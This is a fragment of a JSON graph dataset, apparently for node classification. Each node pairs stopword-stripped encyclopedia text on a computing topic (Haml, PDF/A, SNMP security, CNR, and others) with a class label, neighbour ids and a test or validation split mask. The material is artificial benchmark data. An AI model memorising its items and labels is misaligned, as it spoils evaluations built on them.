    "text": "Haml:haml haml html abstraction markup language templating system designed avoid writing inline code web document make html cleaner haml gives flexibility dynamic content html similar web languages like php asp jsp template systems like eruby haml also embeds code gets executed runtime generates html code order provide dynamic content order run haml code files need .haml extension files similar .erb eruby files also help embed ruby code developing web application parsing coding comments haml uses rules ruby 1.9 later haml understands ascii compatible encodings like utf-8 utf-16 utf-32 compatible ascii haml used command line separate ruby module ruby rails application making haml suitable wide range applications haml originally introduced hampton catlin initial release 2006 work taken ahead people motive make html simpler cleaner easier use since 2006 revised several times newer versions released 2012 natalie weizenbaum primary maintainer haml followed norman clarke 2015 natalie worked making haml usable ruby applications branding design done nick walsh others currently maintenance team matt wildig akira matsuda tee parham takashi kokubun version 2.2.0 released july 2009 support ruby 1.9 rails 2.0 version 3.0.0 released may 2010 adding support rails 3 performance improvements fourth major version broke compatibility previous versions supporting rails 3 ruby 1.8.7 marked switch semantic versioning several amendments like increasing performance fixing warnings compatibility latest versions rails fixes documentation many made haml 4 series version 5.0.0 released april 2017 supports ruby 2.0.0 drops compatibility rails 3 'trace option helps users perform tracing haml template added four principles involved development haml markup language user-friendly adheres following features markup language adhere n't repeat dry principle markup language good indentation improves appearance makes easy read readers also determine given element starts ends markup language clear structure help code maintenance logical understanding final result unclear whether haml offers differential advantage regard haml markup similar css syntax example haml dot codice_1 representation classes css making easy developers use markup following equivalent haml recognises css selectors render following html code use haml ruby ruby codice_2 include line similar eruby haml also access local variables declared within file ruby code example uses sample ruby controller file renders use haml independent rails actionview install codice_5 gem include codice_2 simply import codice_7 ruby script invoke ruby interpreter codice_8 flag output haml :engine haml class haml uses whitespace indentation two spaces tag nesting scope acts replacement open-end tag pairs making dry cleaner following example compares syntaxes haml eruby embedded ruby alongside html output key differences note simple preview example may reflect current version language haml would produce xhtml official implementation haml built ruby plugins ruby rails merb ruby implementation also functions independently haml easily used along languages list languages haml implementations",
    "neighbors": [
      9345,
      8644,
      5578,
      5612,
      7983,
      9714,
      5651,
      11221,
      119,
      5945,
      8923,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 3121,
    "label": 7,
    "text": "Content_as_a_service:content service content service caas managed content service mcaas service-oriented model service provider delivers content demand service consumer via web services licensed subscription content hosted service provider centrally cloud offered number consumers need content delivered applications system hence content demanded consumers required content service way provide raw content words without need specific human compatible representation html way systems make use content service meant direct human consumption rather platforms consume make use content according particular needs happens usually cloud centralized platform globally accessible provides standard format content content service centralize content single repository manage categorize make available others search whatever wish content delivered typically could one following term content service caas considered part nomenclature cloud computing service models service-oriented architecture along software service saas infrastructure service iaas platform service paas desktop service daas managed software service msaas digital content service dcaas mobile backend service mbaas information technology management service itmaas",
    "neighbors": [
      6018,
      1539,
      8451,
      4107,
      4236,
      6027,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      10893,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 3122,
    "label": 2,
    "text": "Class_driver:class driver computing class driver type hardware device driver operate large number different devices broadly similar type class drivers often used usb based devices share essential usb protocol common devices similar functionality easily adopt common protocols another example instead separate driver every kind cd-rom device class driver operate wide variety cd-roms different manufacturers accomplish manufacturers make products compatible standardized protocol technical terms class driver used base ancestor class specific drivers need slightly different extended functionality take advantage majority functionality provided class driver concept key aspect object oriented programming extended drivers makes much easier hardware vendors provide driver support products",
    "neighbors": [
      8161,
      7106,
      2221,
      8080,
      1656
    ],
    "mask": "None"
  },
  {
    "node_id": 3123,
    "label": 3,
    "text": "Media_processor:media processor media processor mostly used image video processor microprocessor-based system-on-a-chip designed deal digital streaming data real-time e.g display refresh rates devices also considered class digital signal processors dsps unlike graphics processing units gpus used computer displays media processors targeted digital televisions set-top boxes streaming digital media classes include socs composed microprocessor might optimizations previous media processors streaming media datatypes processed using fixed-function hardwired asics could updated field big disadvantage media standards changed since media processors software programmed devices processing done could updated new software releases allowed new generations systems created without hardware redesign set-top boxes even allows possibility in-the-field upgrade downloading new software cable satellite networks companies pioneered idea media processors created marketing term media processor included consumer electronics companies successfully dominated market designing media processors integrating video products companies philips samsung matsushita fujitsu mitsubishi in-house media processor devices newer generations devices use various forms multiprocessing—multiple cpus dsps order deal vastly increased computational needs dealing high definition television signals",
    "neighbors": [
      10658,
      7108,
      9126,
      2506,
      9137,
      3323,
      10782
    ],
    "mask": "None"
  },
  {
    "node_id": 3124,
    "label": 6,
    "text": "Fusion_File_System:fusion file system fusion flash file system file system computers using embedded flash memory written ansi c targeted embedded system uses flash ram rom used file storage media uses layered device driver architecture using simple binding model allow operating system agnostic independent portability meaning file system compatible operating systems thus bound one rtos embedded file systems typically require low memory usage fusion compact memory also fully dynamic read rom-style file system according vendor web site multithread capable fat12/fat16/fat32 compatible also features wear leveling post error correction data compression many commercial file systems fusion file system accompanied full suite supporting software modules include error correction file compression fusion standard c lib driver model i/o manager",
    "neighbors": [
      9762,
      1801,
      9932,
      7983,
      9366,
      5661
    ],
    "mask": "None"
  },
  {
    "node_id": 3125,
    "label": 4,
    "text": "Security_management:security management security management identification organization assets including people buildings machines systems information assets followed development documentation implementation policies procedures protecting assets organisation uses security management procedures asset information classification threat assessment risk assessment risk analysis identify threats categorise assets rate system vulnerabilities implement effective controls loss prevention focuses critical assets going protect key component loss prevention assessing potential threats successful achievement goal must include potential opportunities object take risk unless upside balance probability impact determine implement measures minimize eliminate threats management security risks applies principles risk management management security threats consists identifying threats risk causes assessing effectiveness existing controls face threats determining risks consequence prioritizing risks rating likelihood impact classifying type risk selecting appropriate risk option risk response 2016 universal standard managing risks developed netherlands 2017 updated named universal security management systems standard 2017 first choice considered possibility eliminating existence criminal opportunity avoiding creation opportunity always best solution additional considerations factors created result action would create greater risk example removing cash retail outlet would eliminate opportunity stealing cash–but would also eliminate ability conduct business avoiding eliminating criminal opportunity conflicts ability conduct business next step reduction opportunity potential loss lowest level consistent function business example application risk reduction might result business keeping enough cash hand one day ’ operation assets remain exposed application reduction avoidance subjects risk spreading concept limits loss potential losses exposing perpetrator probability detection apprehension prior consummation crime application perimeter lighting barred windows intrusion detection systems idea reduce time available steal assets escape without apprehension transferring risks alternatives risks reduced acceptable levels two primary methods accomplishing risk transfer insure assets raise prices cover loss event criminal act generally speaking first three steps properly applied cost transferring risks much lower remaining risks must simply assumed business risk business included accepted losses deductibles made part insurance coverage",
    "neighbors": [
      3392,
      3552,
      4448,
      11526,
      11594,
      4843,
      11567,
      2737,
      4689,
      8881,
      10804,
      11542,
      8668,
      5245,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 3126,
    "label": 9,
    "text": "PDF/A:pdf/a pdf/a iso-standardized version portable document format pdf specialized use archiving long-term preservation electronic documents pdf/a differs pdf prohibiting features unsuitable long-term archiving font linking opposed font embedding encryption iso requirements pdf/a file viewers include color management guidelines support embedded fonts user interface reading embedded annotations pdf standard encoding documents printed form portable systems however suitability pdf file archival preservation depends options chosen pdf created notably whether embed necessary fonts rendering document whether use encryption whether preserve additional information original document beyond needed print pdf/a originally new joint activity association suppliers printing publishing converting technologies npes association information image management develop international standard defining use portable document format pdf archiving documents goal address growing need electronically archive documents way would ensure preservation contents extended period time ensure documents would able retrieved rendered consistent predictable result future need exists wide variety government industry academic areas worldwide including legal systems libraries newspapers regulated industries pdf/a standard define archiving strategy goals archiving system identifies profile electronic documents ensures documents reproduced exactly way using various software years come key element reproducibility requirement pdf/a documents 100 self-contained information necessary displaying document manner embedded file includes limited content text raster images vector graphics fonts color information pdf/a document permitted reliant information external sources e.g font programs data streams may include annotations e.g hypertext links link external documents key elements pdf/a conformance include part 1 standard first published september 28 2005 specifies two levels conformance pdf files level b conformance requires standards necessary reliable reproduction document visual appearance followed level conformance includes level b requirements addition features intended improve document accessibility additional level requirements level conformance intended increase accessibility conforming files physically impaired users allowing assistive software screen readers precisely extract interpret file contents later standard pdf/ua developed eliminate became considered pdf/a shortcomings replacing many general guidelines detailed technical specifications part 2 standard published june 20 2011 addresses new features added versions 1.5 1.6 1.7 pdf reference pdf/a-1 files necessarily conform pdf/a-2 pdf/a-2 compliant files necessarily conform pdf/a-1 part 2 pdf/a standard based pdf 1.7 iso 32000-1 rather pdf 1.4 offers number new features part 2 defines three conformance levels pdf/a-2a pdf/a-2b correspond conformance levels b pdf/a-1 new conformance level pdf/a-2u represents level b conformance pdf/a-2b additional requirement text document unicode mapping part 3 standard published october 15 2012 differs pdf/a-2 one regard allows embedding arbitrary file formats xml csv cad word-processing documents spreadsheet documents others pdf/a conforming documents part 4 standard based pdf 2.0 expected published 2019 pdf/a document identified pdf/a-specific metadata located nowiki http //www.aiim.org/pdfa/ns/id/ /nowiki namespace metadata represents claim conformance ensure conformance industry collaboration original pdf/a competence center led development isartor test suite 2007 2008 test suite consists 204 pdf files intentionally constructed systematically fail requirements pdf/a-1b conformance allowing developers test ability software validate standard basic level conformance mid-2009 test suite already made appreciable difference general quality pdf/a validation software verapdf consortium led open preservation foundation pdf association created response eu commission preforma challenge develop open-source validator pdf/a format pdf association launched pdf validation technical working group november 2014 articulate plan developing industry-supported pdf/a validator verapdf consortium subsequently phase 2 preforma contract april 2015 development continued throughout 2016 phase 2 completed on-schedule december 2016 phase 3 testing acceptance period concluded july 2017. verapdf covers parts 1 2 3 conformance levels b u pdf/a verapdf available installation windows macos linux using pdfbox-based greenfields pdf parser pdf/a specification also states requirements conforming pdf/a viewer must encountering file claims conformance pdf/a pdf viewers default special pdf/a viewing mode fulfill conforming reader requirements take one example adobe acrobat adobe reader 9 include alert advise user pdf/a viewing mode activated pdf viewers allow users disable pdf/a viewing mode remove pdf/a information file pdf/a document must embed fonts use accordingly pdf/a file often larger equivalent pdf file include embedded fonts use transparency forbidden pdf/a-1 majority pdf generation tools allow pdf/a document compliance pdf export openoffice.org pdf export tool microsoft office 2007 suites also make transparent images given document non-transparent restriction removed pdf/a-2 archivists voiced concerns pdf/a-3 allows arbitrary files embedded pdf/a documents could result circumvention memory institution procedures restrictions archived formats pdf association addressed various misconceptions regarding pdf/a publication pdf/a nutshell 2.0 converting pdf version 1.4 pdf/a-2 usually works expected except problems glyphs according pdf association problems occur and/or generation pdfs pdf/a file formally correct yet still incorrect glyphs careful visual check uncover problem generation problems also affect unicode mapping problem attracts attention visual check carried extracted text pdf/a text/font usage specified uniquely enough ensure incorrect viewers printers offer complete support encoding systems result problems regard pdf/a meaning document completely compliant standard correct internally system used viewing printing document may produce undesired results document produced optical character recognition ocr conversion pdf/a-2 pdf/a-3 n't support codice_1 flag therefore type conversion result unrendered content",
    "neighbors": [
      10752,
      3462,
      8854,
      11036,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      8628,
      10238,
      1079,
      5816,
      6977,
      8904,
      1610,
      9290,
      8524,
      3921,
      2519,
      2904,
      4058,
      4064,
      5857,
      8421,
      8426,
      5614,
      10352,
      1010,
      3447,
      2045,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 3127,
    "label": 0,
    "text": "Shallow_parsing:shallow parsing shallow parsing also chunking light parsing analysis sentence first identifies constituent parts sentences nouns verbs adjectives etc links higher order units discrete grammatical meanings noun groups phrases verb groups etc. elementary chunking algorithms simply link constituent parts basis elementary search patterns e.g specified regular expressions approaches use machine learning techniques classifiers topic modeling etc take contextual information account thus compose chunks way better reflect semantic relations basic constituents advanced methods get around problem combinations elementary constituents different higher level meanings depending context sentence technique widely used natural language processing similar concept lexical analysis computer languages name shallow structure hypothesis also used explanation second language learners often fail parse complex sentences correctly",
    "neighbors": [
      5122,
      5635,
      8323,
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      3617,
      7724,
      7599,
      4531,
      4662,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      1890,
      7780,
      7013,
      9577,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 3128,
    "label": 4,
    "text": "Passports_issued_by_the_European_Union_candidate_states:passports issued european union candidate states since 1980s member states european union started harmonise aspects designs ordinary passports types passports diplomatic service emergency passports well common security features biometrics passports issued eu member states common recommended lay burgundy colour words “ european union ” accompanied name issuing member state printed cover information cover order language issuing state information first page one languages information possibly laminated identification page languages issuing state plus english french optional information following page nationals iceland full freedom movement residence within territory eea derives eea eu law nationals candidate countries varying visa arrangements schengen area common travel area members well united states canada following table details requirements enlargement european union involves accession new member states process began inner six founded european coal steel community eu predecessor 1952 since eu membership grown twenty-eight recent expansion croatia 2013 currently accession negotiations way several states process enlargement sometimes referred european integration term also used refer intensification co-operation eu member states national governments allow gradual harmonisation national laws join european union state needs fulfil economic political conditions called copenhagen criteria copenhagen summit june 1993 require stable democratic government respects rule law corresponding freedoms institutions according maastricht treaty current member state european parliament must agree enlargement present enlargement agenda european union regards turkey western balkans iceland turkey long-standing application eu negotiations expected take many years western balkan states eu pledged include civil wars fact two states entered three candidates one applied others pre-accession agreements finally iceland recently frozen negotiations eu however states europe either seek membership could potentially apply present foreign policy changes eu gives signal might included enlargement agenda however formally part current agenda already delayed due bilateral disputes balkans difficulty fully implementing acquis communautaire accepted body eu law today accession process follows series formal steps pre-accession agreement ratification final accession treaty steps primarily presided european commission enlargement commissioner dg enlargement actual negotiations technically conducted union member states candidate country country applies membership typically signs association agreement help prepare country candidacy eventual membership countries meet criteria even begin negotiations apply need many years prepare process association agreement helps prepare first step case western balkans special process stabilisation association process exists deal special circumstances country formally applies membership council asks commission prepare opinion country readiness begin negotiations council either accept reject commission opinion council rejected commission opinion latter advised opening negotiations greece council agrees open negotiations screening process begins commission candidate country examine laws eu determine differences exist council recommends opening negotiations chapters law feels sufficient common ground constructive negotiations negotiations typically matter candidate country convincing eu laws administrative capacity sufficient execute european law implemented seen fit member states often involve time-lines acquis communautaire european regulations directives standards fully implemented",
    "neighbors": [
      10685,
      8270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3129,
    "label": 2,
    "text": "Linux_XP:linux xp linux xp™️ fedora-based shareware linux distribution designed imitate windows environment using gnome desktop could run microsoft windows programs using wine compatibility layer linux xp registered within 99 boots installation os would deactivate",
    "neighbors": [
      8837,
      8713,
      11145,
      7435,
      6797,
      7823,
      10127,
      2321,
      5267,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9064,
      9253,
      10149,
      11305,
      10156,
      7854,
      2738,
      4790,
      439,
      56,
      7224,
      59,
      7483,
      1853,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      1632,
      1761,
      2914,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      4076,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 3130,
    "label": 7,
    "text": "CRI_Middleware:cri middleware cri started csk research institute subsidiary csk producing video games mega drive/genesis went develop games sega saturn dreamcast incorporated cri middleware 2001 adx streamed audio format allows multiple audio streams seamless looping continuous playback allowing two files crossfaded played sequence low predictable cpu usage format uses adpcm framework known cri adx sofdec streamed video format supporting 24bit color includes multistreaming seamless playback frame rate 60 frames per second essentially repackaging mpeg-1/mpeg-2 video cri proprietary adx codec audio playback known cri sofdec clipper automated lip-syncing program analyzes waveforms outputs appropriate lip pattern text file later substitution facial animations in-game speaker known cri clipper rofs file management system handling virtual disc image extension cd-rom standard limitations file name format number directories files designed compatibility adx sofdec mind known cri rofs sound factory gui-based video game audio tool effective sound design without input programmers support previewing playback generated audio known cri sound factory movie encode video encoding service cri generates sofdec mpeg files media fee designated length file encoded files converted desired format quality specified client known cri movie encode cri movie high definition video support cri filemajik file system features asynchronous file requests prioritized loads zero-buffer decompression umd speed emulation playstation portable",
    "neighbors": [
      7108,
      8071,
      1776,
      1753,
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 3131,
    "label": 2,
    "text": "CNR_(software):cnr software cnr one-click run free one-click software delivery service created make finding installing linux software easier assists user finding installing software computer sits dormant system tray use cnr offered large database linux programs suitable everyday specialty usage available linspire linux operating systems versions linux well 2002 legacy cnr created digital software delivery service created linspire inc service provide desktop linux user online software warehouse could click product installed desktop automatically required paid membership 49.95 use service warehouse hosted free non-free commercial linux software titles service relied client application work concert debian apt dpkg resolve dependencies install files 2006 support community linspire changed membership program two-tier system cnr basic cnr gold originally introduced 19.95-per-year subscription cnr basic membership later made free user could access free non-free software without subscription linspire announced plans april 24 2006 release cnr free software/open source license could used linux distributions early 2007 linspire announced going expand cnr service distributions namely debian ubuntu future extensions rpm linspire hoped consolidate aggregate desktop linux software one service provide easier method finding installing software desktop linux december 2007 linspire announced beta release new cnr.com service support updated linspire freespire distributions ubuntu 7.04 feisty ubuntu 7.10 gutsy planned ubuntu 8.04 hardy april 2008 march 10 2008 linspire closed legacy cnr service cnr also provides access thousands web-based applications providing linux community option local linux web software available single source february 2008 abilities browse search library products additional abilities planned improve web software experience bookmarking community also ability add new products already extensive library applications available cnr.com built collection services commonly referred service-oriented architecture soa highly scalable architecture built using following jee 5 technologies following list major services descriptive information one import service responsible importing package repositories parsing package metadata matching packages products using complex heuristically based algorithm import service supports debian based distribution rpm based packages supported domain model additional work specific rpm package metadata schema release management practices import service 98 success rate matching packages products admin support tools finding correcting problems quickly service responsible making cnr.com largest software warehouse desktop linux warehouse service contains web services apis used external clients acquire access install products cnr.com apis open public soap based apis consist following warehouse service also handles product requisite management product requisites user access requirements must fulfilled user gain install access product product requisites consist following ecommerce service handles purchases commercial software purchases member services collection user acceptance product eulas products require ecommerce service also responsible handling drm requirements software delivering activation codes user account registration isvs user management service handles creation management user accounts well authentication authorization user accounts user access respectively authentication managed using ldap sso utilized via token federation service package management service handles secure non-secure storage packages provides secure delivery types packages free non-free commercial making cnr.com industry leader delivering desktop linux software service also responsible categorization product categories xdg base extended set cnr categories found xdg set intended enhanced searchability community service provides forum wiki document blogging features community general product product mini-community discussions self-help community support thrive presentation layer cnr.com architecture responsible providing web 2.0 interfaces interfaces allow following features interfaces include product chart refresh cycle per 10 minutes various administrative interfaces viewing managing product user data support service provides tracking managing resolving user submitted support issues also facility paid support features versus free support features mail list service responsible mailing list enrollment subscription management well sending system emails user result user-based activity site secure data service responsible secure storage credit card profiles user elected save category data service responsible storage data associated product categories audit data service responsible storage user activity records installs client registration machine registrations etc product data service responsible storage product specific data well product aggregation data warehouse data service responsible storage package level data distribution level data resource data service responsible storage images associated product including user provided images like logos screenshots cnr client desktop client application interfaces apt dpkg desktop warehouse web services server intended provide starting point community build variations client software application written c++ gui built qt framework api integration done gsoap framework cnr client open source open licensed anyone use purposes without need license features include linspire planned port cnr service ubuntu distribution company announced plans april 24 2006 release cnr free software/open source license could used linux distributions january 23 2007 cnr website launched however launching warehouse announced q2 2007 release new free/open-source cnr client plug-in planned coincide release freespire 2.0 linspire 6.0 include free/open-source cnr client plug-in new cnr known internally linspire/freespire cnr 7 july 1 2008 linspire changed corporate name digital cornerstone acquired xandros deal gives xandros ownership linspire trademarks patents assets including cnr expected cnr client eventually made available xandros line desktop linux operating systems 2009 xandros introduced new app store based cnr includes access presto operating system six distributions expected supported time cnr 7 launch debian fedora core freespire linspire opensuse ubuntu feisty fawn support distributions expected starting 2008 test version cnr 7 released july 19 2007",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      2448,
      1813,
      6680,
      8476,
      10526,
      5670,
      4775,
      7847,
      6828,
      3245,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      10172,
      3649,
      10817,
      9671,
      5067,
      6860,
      6227,
      4951,
      5721,
      2010,
      9564,
      7140,
      5096,
      9324,
      7022,
      10096,
      6257,
      1138,
      1522,
      10486,
      6393,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 3132,
    "label": 9,
    "text": "Cadence_SKILL:cadence skill skill lisp dialect used scripting language pcell parameterized cells description language used many eda software suites cadence design systems originally put forth ieee paper 1990 skill originally based flavor lisp called franz lisp created uc berkeley students professor richard j. fateman skill acronym name trademark reasons cadence prefers capitalized franz lisp flavors lisp eventually superseded ansi standard common lisp historically skill known il skill library il functions name originally initialism silicon compiler interface language scil pronounced skil morphed skill plain english word easier everyone remember il interface language although skill used initially describe api rather language snappier name stuck name il remains common file extension used skill code designating code contained file lisp-2 semantics another possible file extension designating content lisp-1 semantics academic",
    "neighbors": [
      4992,
      9345,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      9780,
      11255,
      311,
      2105,
      6906,
      7867,
      3132,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      11625,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      4474,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 3133,
    "label": 5,
    "text": "Simple_Network_Management_Protocol:simple network management protocol simple network management protocol snmp internet standard protocol collecting organizing information managed devices ip networks modifying information change device behavior devices typically support snmp include cable modems routers switches servers workstations printers snmp widely used network management network monitoring snmp exposes management data form variables managed systems organized management information base mib describe system status configuration variables remotely queried circumstances manipulated managing applications three significant versions snmp developed deployed snmpv1 original version protocol recent versions snmpv2c snmpv3 feature improvements performance flexibility security snmp component internet protocol suite defined internet engineering task force ietf consists set standards network management including application layer protocol database schema set data objects typical uses snmp one administrative computers called managers task monitoring managing group hosts devices computer network managed system executes software component called agent reports information via snmp manager snmp-managed network consists three key components managed device network node implements snmp interface allows unidirectional read-only bidirectional read write access node-specific information managed devices exchange node-specific information nmss sometimes called network elements managed devices type device including limited routers access servers switches cable modems bridges hubs ip telephones ip video cameras computer hosts printers agent network-management software module resides managed device agent local knowledge management information translates information snmp-specific form network management station executes applications monitor control managed devices nmss provide bulk processing memory resources required network management one nmss may exist managed network snmp agents expose management data managed systems variables protocol also permits active management tasks configuration changes remote modification variables variables accessible via snmp organized hierarchies snmp define variables managed system offer rather snmp uses extensible design allows applications define hierarchies hierarchies described management information base mib mibs describe structure management data device subsystem use hierarchical namespace containing object identifiers oid oid identifies variable read set via snmp mibs use notation defined structure management information version 2.0 smiv2 subset asn.1 snmp operates application layer internet protocol suite snmp messages transported via user datagram protocol udp snmp agent receives requests udp port 161 manager may send requests available source port port 161 agent agent response sent back source port manager manager receives notifications traps informrequests port 162 agent may generate notifications available port used transport layer security datagram transport layer security requests received port 10161 notifications sent port 10162 snmpv1 specifies five core protocol data units pdus two pdus getbulkrequest informrequest added snmpv2 report pdu added snmpv3 snmp pdus constructed follows seven snmp pdu types identified pdu-type field follows snmpv1 snmpv2 use communities establish trust managers agents agents support three community names one read-only read-write trap three community strings control different types activities read-only community applies get requests read-write community string applies set requests trap community string applies receipt traps snmpv3 also uses community strings allows secure authentication communication snmp manager agent practice snmp implementations often support multiple versions typically snmpv1 snmpv2c snmpv3 snmp version 1 snmpv1 initial implementation snmp protocol design snmpv1 done 1980s group collaborators viewed officially sponsored osi/ietf/nsf national science foundation effort hems/cmis/cmip unimplementable computing platforms time well potentially unworkable snmp approved based belief interim protocol needed taking steps towards large scale deployment internet commercialization first request comments rfcs snmp known snmpv1 appeared 1988 1990 documents superseded 1991 mib-1 replaced often used snmpv1 widely used de facto network management protocol internet community snmpv1 may carried transport layer protocols user datagram protocol udp internet protocol ip osi connectionless-mode network service clns appletalk datagram delivery protocol ddp novell internetwork packet exchange ipx version 1 criticized poor security specification fact allow room custom authentication used widely used implementations support trivial authentication service identifies snmp messages authentic snmp messages. security messages therefore becomes dependent security channels messages sent example organization may consider internal network sufficiently secure encryption necessary snmp messages cases community name transmitted cleartext tends viewed de facto password spite original specification snmpv2 defined revises version 1 includes improvements areas performance security manager-to-manager communications introduced getbulkrequest alternative iterative getnextrequests retrieving large amounts management data single request new party-based security system introduced snmpv2 viewed many overly complex widely adopted version snmp reached proposed standard level maturity deemed obsolete later versions community-based simple network management protocol version 2 snmpv2c defined – snmpv2c comprises snmpv2 without controversial new snmp v2 security model using instead simple community-based security scheme snmpv1 version one relatively standards meet ietf draft standard maturity level widely considered de facto snmpv2 standard later restated part snmpv3 user-based simple network management protocol version 2 snmpv2u defined – compromise attempts offer greater security snmpv1 without incurring high complexity snmpv2 variant commercialized snmp v2* mechanism eventually adopted one two security frameworks snmp v3 snmpv2c incompatible snmpv1 two key areas message formats protocol operations snmpv2c messages use different header protocol data unit pdu formats snmpv1 messages snmpv2c also uses two protocol operations specified snmpv1 overcome incompatibility defines two snmpv1/v2c coexistence strategies proxy agents bilingual network-management systems snmpv2 agent act proxy agent behalf snmpv1 managed devices follows proxy agent maps snmpv1 trap messages snmpv2 trap messages forwards nms bilingual snmpv2 network-management systems support snmpv1 snmpv2 support dual-management environment management application bilingual nms must contact agent nms examines information stored local database determine whether agent supports snmpv1 snmpv2 based information database nms communicates agent using appropriate version snmp although snmpv3 makes changes protocol aside addition cryptographic security looks much different due new textual conventions concepts terminology visible change define secure version snmp adding security remote configuration enhancements snmp due lack security earlier versions network administrators often used means telnet ssh configuration accounting fault management snmpv3 focuses two main aspects namely security administration security aspect addressed offering strong authentication data encryption privacy administration aspect snmpv3 focuses two parts namely notification originators proxy forwarders changes also facilitated remote configuration administration snmp entities well addressing issues related large-scale deployment accounting fault management features enhancements included security one biggest weakness snmp v3 authentication snmp versions 1 2 amounts nothing password community string sent clear text manager agent snmpv3 message contains security parameters encoded octet string meaning security parameters depends security model used security approach v3 targets v3 also defines usm vacm later followed transport security model provided support snmpv3 ssh snmpv3 tls dtls snmp implementations vary across platform vendors cases snmp added feature taken seriously enough element core design major equipment vendors tend over-extend proprietary command line interface cli centric configuration control systems february 2002 carnegie mellon software engineering institute cm-sei computer emergency response team coordination center cert-cc issued advisory snmpv1 ca-2002-03 oulu university secure programming group conducted thorough analysis snmp message handling snmp implementations regardless version protocol use program code decoding protocol data units pdu thus many vendors issue patches snmp implementations among others problems found decoding snmp trap messages received snmp management station requests received snmp agent network device snmp powerful write capabilities would allow configuration network devices fully utilized many vendors partly lack security snmp versions snmpv3 partly many devices simply capable configured via individual mib object changes requirements snmp set operation easy implement correctly many vendors chose omit support set – probably lower development cost reduce code size among reasons snmp seemingly simple tree structure linear indexing may always understood well enough within internal data structures elements platform basic design consequently processing snmp queries certain data sets may result higher cpu utilization necessary one example would large routing tables bgp igp snmp values especially tabular values require specific knowledge table indexing schemes index values necessarily consistent across platforms cause correlation issues fetching information multiple devices may employ table indexing scheme example fetching disk utilization metrics specific disk identifier different across platforms modular devices may dynamically increase decrease snmp indices a.k.a instances whenever slotted hardware added removed although common hardware virtual interfaces effect index values typically assigned boot time remain fixed next reboot hardware virtual entities added device 'live may indices assigned end existing range possibly reassigned next reboot network inventory monitoring tools need device update capability properly reacting cold start trap device reboot order avoid corruption mismatch polled data index assignments snmp device instance may change poll poll mostly result changes initiated system administrator information needed particular interface imperative determine snmp index retrieving data needed generally description table like ifdescr map user friendly name like serial 0/1 blade 0 port 1 snmp index however necessarily case specific snmp value arbitrary snmp implementation snmp designed allow administrators monitor configure network devices remotely also used penetrate local area network lan snmp used network turned aside creating vulnerability consume available network bandwidth needlessly use cpu cycles significant number software tools scan entire network snmp therefore mistakes configuration read-write mode make network susceptible attacks 2001 cisco released information even read mode snmp implementation cisco ios 11.0 12.0 operating system used switches routers vulnerable certain denial service attacks security issues fixed ios upgrade configuring snmp read-only mode close attention paid configuration access control ip addresses snmp messages accepted snmp servers identified ip snmp allowed respond ips snmp messages ip addresses would denied however ip address spoofing remains security concern snmp available different versions 1 2 3 security issues snmp v1 sends passwords clear-text network therefore passwords read packet sniffing snmp v2 allows password hashing md5 configured virtually network management software support snmp v1 necessarily snmp v2 v3 snmp v2 specifically developed provide data security authentication privacy authorization snmp version 2c gained endorsement internet engineering task force ietf versions 2u 2* failed gain ietf approval due security issues snmp v3 uses md5 secure hash algorithm sha keyed algorithms offer protection unauthorised data modification masquerade attacks higher level security needed data encryption standard des optionally used cipher block chaining mode snmp v3 implemented cisco ios since release 12.0 3 t. snmpv3 may subject brute force dictionary attacks guessing authentication keys encryption keys keys generated short weak passwords passwords found dictionary snmpv3 allows providing random uniformly distributed cryptographic keys generating cryptographic keys password supplied user risk guessing authentication strings hash values transmitted network depends hash function used length hash value snmpv3 uses hmac-sha-2 authentication protocol user-based security model usm challenge-response handshake used improve security snmpv3 like snmp protocol versions stateless protocol designed minimal amount interactions agent manager thus introducing challenge-response handshake command would impose burden agent possibly network protocol designers deemed excessive unacceptable security deficiencies snmp versions mitigated ipsec authentication confidentiality mechanisms implementation snmp datagram transport layer security dtls also available snmp based network management software send passwords repeatedly normal operations across network therefore clear-text passwords significant security risk snmp v2 used network administrator enable password encryption network devices snmp servers running done command snmp-server enable traps snmp authentication md5 many snmp implementations include type automatic discovery new network component switch router discovered pooled automatically snmpv1 v2c done community string broadcast clear-text devices default configuration community strings public read-only access private read-write snmp topped list sans institute common default configuration issues number ten sans top 10 critical internet security threats year 2000 system network administrators frequently change configurations community string sent snmp network encrypted community string known outside organisation could become target attack 